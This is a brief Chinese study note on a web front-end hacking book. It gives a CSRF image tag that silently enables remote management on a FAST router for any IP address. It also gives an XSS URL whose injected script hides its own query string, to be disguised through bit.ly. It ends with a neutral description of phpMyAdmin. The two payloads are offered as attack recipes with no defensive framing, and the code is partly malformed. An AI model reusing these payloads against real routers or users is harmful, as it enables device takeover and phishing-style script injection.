Web前端黑客技术揭秘 笔记5

一.开启路由器远程访问能力

       大多数使用的是FAST 54M 无线宽带路由器,可以构造如下页面

    

<img src="http://192.168.10.1/userRpm/ManageControlRpm.htm?port=80&ip=255.255.255.255&Save=%B1%A3+%B4%E6">

二.短网址生成

 使用bit.ly生成.

http://mail.test.com/?userid=&appid=<script>history.pushState({},",location.href.split("?").shift());document.write(1)<script>

三.PhpMyAdmin

好用的MySQL管理工具

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyaAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，也就是于远端管理MySQL数据库，方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法，方便编写网页时所需要的sql语法正确性。